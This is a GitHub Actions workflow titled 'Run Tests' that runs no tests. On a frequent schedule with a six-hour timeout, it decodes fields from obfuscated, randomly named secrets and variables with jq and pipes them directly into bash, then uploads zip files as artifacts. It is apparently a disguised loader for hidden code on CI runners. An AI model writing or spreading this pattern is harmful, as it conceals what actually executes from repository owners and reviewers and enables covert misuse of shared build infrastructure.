name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '54 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          g9644: ${{ secrets.g9644 }}
        run: |
          printf '%s' "$g9644" | jq -r .qg6238 | /bin/bash
          printf '%s' "$l3953" | jq -r .yct07177 | /bin/bash
          printf '%s' "$fby3" | jq -r .tr57 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: o032ot7y
          path: "*.zip"
          retention-days: 1
